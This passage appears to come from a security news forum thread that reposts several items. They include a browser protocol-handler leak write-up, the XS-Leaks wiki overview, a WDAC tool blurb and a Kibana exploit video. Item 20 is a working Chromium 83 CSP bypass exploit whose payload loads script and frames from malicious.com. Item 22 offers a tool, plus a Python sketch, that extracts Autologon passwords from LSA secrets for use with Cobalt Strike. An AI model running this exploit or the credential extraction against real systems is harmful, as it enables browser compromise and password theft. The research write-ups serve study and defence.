version control clients, chat clients, voice conference apps, shared storages Pre-exploitation detection: Exploit kits may leverage this information in order to identify if a potentially vulnerable application is present without exposing the vulnerability itself. 
Detecting security solutions: Many security solutions, such as AV products, register custom protocol handlers whose presence can be exposed by leveraging these vulnerabilities. Attackers may use this to further customize their attack so that it circumvents any protection mechanism set by those security solutions. User fingerprinting: reading which protocol handlers exist on a system may also be used to improve browser/user fingerprinting algorithms.
Vendor Response: Below is a table specifying the vendor responses.
  • Mozilla: The security team at Mozilla were quick to respond and have issued a fix for the bug (CVE-2020-15680).
  • Microsoft: The vendor decided not to fix the issue, with the following explanation: "This is by design (and not a security issue) - if we want to support registered protocol handler links from the browser, it seems like there'll be various ways to detect whether a link for a particular protocol handler worked or not"
  • Google: The vendor decided to treat this as a "user fingerprinting issue" rather than a security issue and is working on a patch. "The general consensus on the security team is that none of the concerns here relate to leaking user data, and that this is best handled as a fingerprinting bug"
Summary: In this post we uncovered a new type of information disclosure vulnerability in Chrome, Edge and Firefox and identified how attackers can leverage it to gain valuable insights which could assist them in compromising their targets. By enabling interaction with other applications through URL handlers, browsers may ease engagement with third-party software, but they also widen the attack surface by giving the attacker a chance to attack the user through other applications. While Microsoft and Google currently don't consider it a security issue, we believe that being able to expose the presence of other software, including security software, on targeted devices should be prevented. With that being said, we anticipate that in the near future we shall see an increase in the number of attacks which exploit the different URL handlers through the user's web browser. FortiEDR can detect and block these browser-based exploits and provide visibility into such attempts. Sursa: https://www.fortinet.com/blog/threat-research/leaking-browser-url-protocol-handlers
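     Related to the registry mechanism described at the start of the post, here is a minimal Python sketch (Windows only) that enumerates registered URL protocol handlers by looking for the "URL Protocol" value under HKEY_CLASSES_ROOT. It is a local illustration of the same inventory that the browser-based leaks infer remotely.
     import winreg

     def list_url_protocol_handlers():
         handlers = []
         index = 0
         while True:
             try:
                 name = winreg.EnumKey(winreg.HKEY_CLASSES_ROOT, index)
             except OSError:
                 break          # no more subkeys
             index += 1
             try:
                 with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, name) as key:
                     winreg.QueryValueEx(key, "URL Protocol")  # raises if the value is absent
                     handlers.append(name)
             except OSError:
                 continue       # ordinary file-type class, not a URL handler
         return handlers

     print(list_url_protocol_handlers())   # e.g. ['msteams', 'skype', ...]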
  20. #Title: Chromium 83 - Full CSP Bypass
  #Date: 02/09/2020
  #Exploit Author: Gal Weizman
  #Vendor Homepage: https://www.chromium.org/
  #Software Link: https://download-chromium.appspot.com/
  #Version: 83
  #Tested On: Mac OS, Windows, iPhone, Android
  #CVE: CVE-2020-6519

  (function(){
      var payload = `
          top.SUCCESS = true;
          var o = document.createElement("object");
          o.data = \`http://malicious.com/bypass-object-src.html\`;
          document.body.appendChild(o);
          var i = document.createElement("iframe");
          i.src = \`http://malicious.com/bypass-child-src.html\`;
          document.body.appendChild(i);
          var s = document.createElement("script");
          s.src = \`http://malicious.com/bypass-script-src.js\`;
          document.body.appendChild(s);
      `;
      document.body.innerHTML += "<iframe id='XXX' src='javascript:" + payload + "'></iframe>";
      setTimeout(() => {
          if (!top.SUCCESS) {
              XXX.contentWindow.eval(payload);
          }
      });
  }())

  // further information: https://github.com/weizman/CVE-2020-6519
  Sursa: https://www.exploit-db.com/exploits/49195?utm_source=dlvr.it&utm_medium=twitter
  21. WDAC Policy Wizard: The Windows Defender Application Control Wizard (Version 1.6.1) enables IT professionals to build and deploy WDAC code integrity (CI) policies by wrapping the CI PowerShell cmdlets. Use this application to create new base and supplemental policies, in addition to editing and merging existing (CI) policies. Getting Started: You can install the policy wizard by selecting the download link. Before you install the application: Review the Microsoft open source license for the app. Review the Getting Started instructions on the project's Github repository. Review the change list on the Archives Page. Download the Installer. What's new: The Windows Defender App Control Wizard Version 1.6.1 offers new functionality and bug fixes. The application is updated multiple times per month. Learn more about the new features in Version 1.6.1 in the WDAC changelog. About the Project: The Windows Defender App Control Wizard was created by the Microsoft WDAC feature team as part of an ongoing effort to provide enhanced tooling for professionals leveraging WDAC technologies. See the About Page for more information. Sursa: https://webapp-wdac-wizard.azurewebsites.net/
  22. This tool can extract/decrypt the password that was stored in the LSA by SysInternals Autologon. I made this to be used with Cobalt Strike's execute-assembly. Compiled with .NET 3.0 (Windows Vista's default)+. Needs to be run as SYSTEM, not just as a high integrity process, because the special registry keys needed are only visible to SYSTEM and can only be decrypted by SYSTEM. Why? In order to support Kiosk mode, Windows needs to keep the user's password in a reversible format. This was being kept at HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon under "DefaultUserName" and "DefaultPassword". Autologon was updated to store the passwords in the LSA Secrets registry keys that are only visible to SYSTEM. keithga provided a binary that popped a message box but no source code or command-line version. How it works: through pInvoke calls to LsaOpenPolicy() and LsaRetrievePrivateData(). Credits: Reverse engineered this: https://keithga.wordpress.com/2013/12/19/sysinternals-autologon-and-securely-encrypting-passwords/ Copy and pasted EVERYTHING from here: https://www.pinvoke.net/default.aspx/advapi32/LsaOpenPolicy.html Icon from: https://icon-icons.com/icon/lock-secure-password/99595 SysInternals: https://docs.microsoft.com/en-us/sysinternals/downloads/autologon So thanks to those who actually did the work: keithga, frohwalt. Download Compiled Version HERE Sursa: https://github.com/securesean/DecryptAutoLogon
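     For comparison, here is a rough Python sketch of the same two LSA calls the tool makes (LsaOpenPolicy and LsaRetrievePrivateData), assuming the pywin32 win32security wrappers and a process running as SYSTEM. The access-mask constant and the secret name used by Autologon are assumptions, so treat this as an outline rather than a drop-in replacement.
     # Rough outline only: assumes pywin32 exposes these LSA wrappers and that
     # Autologon stores the secret under "DefaultPassword" (assumption).
     import win32security

     def read_autologon_secret(secret_name="DefaultPassword"):
         policy = win32security.LsaOpenPolicy(None, win32security.POLICY_ALL_ACCESS)
         try:
             # Only SYSTEM can read these LSA private data entries.
             return win32security.LsaRetrievePrivateData(policy, secret_name)
         finally:
             win32security.LsaClose(policy)

     print(read_autologon_secret())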
  23. XS-Leaks Wiki # Overview # Cross-site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user. Browsers provide a wide variety of features to support interactions between different web applications; for example, they permit a website to load subresources, navigate, or send messages to another application. While such behaviors are generally constrained by security mechanisms built into the web platform (e.g. the same-origin policy), XS-Leaks take advantage of small pieces of information which are exposed during interactions between websites. The principle of an XS-Leak is to use such side-channels available on the web to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to. Cross-site oracles # The pieces of information used for an XS-Leak usually have a binary form and are referred to as “oracles”. Oracles generally answer with YES or NO to cleverly prepared questions in a way that is visible to an attacker. For example, an oracle can be asked: Does the word secret appear in the user’s search results in another web application? This question might be equivalent to asking: Does the query ?query=secret return an HTTP 200 status code? Since it is possible to detect the HTTP 200 status code with Error Events, this has the same effect as asking: Does loading a resource from ?query=secret in the application trigger the onload event? The above query could be repeated by an attacker for many different keywords, and as a result the answers could be used to infer sensitive information about the user’s data. Browsers provide a wide range of different APIs that, while well-intended, can end up leaking small amounts of cross-origin information. They are described in detail throughout this wiki. Example # Websites are not allowed to directly access data on other websites, but they can load resources from them and observe the side effects. For example, evil.com is forbidden from explicitly reading a response from bank.com, but evil.com can attempt to load a script from bank.com and determine whether or not it successfully loaded. Example Suppose that bank.com has an API endpoint that returns data about a user’s receipt for a given type of transaction. evil.com can attempt to load the URL bank.com/my_receipt?q=groceries as a script. By default, the browser attaches cookies when loading resources, so the request to bank.com will carry the user’s credentials. If the user has recently bought groceries, the script loads successfully with an HTTP 200 status code. If the user hasn’t bought groceries, the request fails to load with an HTTP 404 status code, which triggers an Error Event. By listening to the error event and repeating this approach with different queries, the attacker can infer a significant amount of information about the user’s transaction history. 
In the example above, two websites of two different origins (evil.com and bank.com) interacted through an API that browsers allow websites to use. This interaction didn’t exploit any vulnerabilities in the browser or in bank.com, but it still allowed evil.com to gain information about the user’s data on bank.com. Root cause of XS-Leaks # The root cause of most XS-Leaks is inherent to the design of the web. Oftentimes applications are vulnerable to some cross-site information leaks without having done anything wrong. It is challenging to fix the root cause of XS-Leaks at the browser level because in many cases doing so would break existing websites. For this reason, browsers are now implementing various Defense Mechanisms to overcome these difficulties. Many of these defenses require websites to opt in to a more restrictive security model, usually through the use of certain HTTP headers (e.g. Cross-Origin-Opener-Policy: same-origin), which often must be combined to achieve the desired outcome. We can distinguish different sources of XS-Leaks, such as: Browser APIs (e.g. Frame Counting and Timing Attacks) Browser implementation details and bugs (e.g. Connection Pooling and typeMustMatch) Hardware bugs (e.g. Speculative Execution Attacks 4) A little bit of history # XS-Leaks have long been part of the web platform; timing attacks to leak information about the user’s web activity have been known since at least 2000. This class of issues has steadily attracted more attention 5 as new techniques were found to increase their impact. In 2015, Gelernter and Herzberg published “Cross-Site Search Attacks” 6 which covered their work on exploiting timing attacks to implement high impact XS-Search attacks against web applications built by Google and Microsoft. Since then, more XS-Leak techniques have been discovered and tested. Recently, browsers have implemented a variety of new defense mechanisms that make it easier to protect applications from XS-Leaks. About this wiki # This wiki is meant to both introduce readers to XS-Leaks and serve as a reference guide for experienced researchers exploiting XS-Leaks. While this wiki contains information on many different techniques, new techniques are always emerging. Improvements, whether they add new techniques or expand existing pages, are always appreciated! Find out how you can contribute to this wiki and view the list of contributors in the Contributions article. References # Side Channel Vulnerabilities on the Web - Detection and Prevention, link ↩︎ In some cases, these features are maintained to preserve backwards compatibility. But, in other cases, new features are added to browsers regardless of the fact that they introduce potential cross-site leaks (e.g. Scroll to Text Fragment), as the benefits are considered to outweigh the downsides. ↩︎ Cross Site Request Forgery (CSRF), link ↩︎ Meltdown and Spectre, link ↩︎ Browser Side Channels, link ↩︎ Cross-Site Search Attacks, link ↩︎ Sursa: https://xsleaks.dev/#xs-leaks-wiki
  24. This video is an explanation of prototype pollution vulnerability in kibana that, in a super cool and very creative way, was used to achieve remote code execution in kibana software. Blogpost: https://research.securitum.com/protot... Researcher's twitter: https://twitter.com/SecurityMB Follow me on twitter: https://twitter.com/gregxsunday Timestamps: 00:00 Intro 00:34 Prototype pollution 02:27 Vulnerability discovery 04:14 Exploitation #rce #prototypePollution #cve-2019-7609
  25. Nytro

    Update Faker

    A website that shows "update screen" animations in your browser, so you can put the browser in fullscreen (F11) and prank your friends: https://updatefaker.com/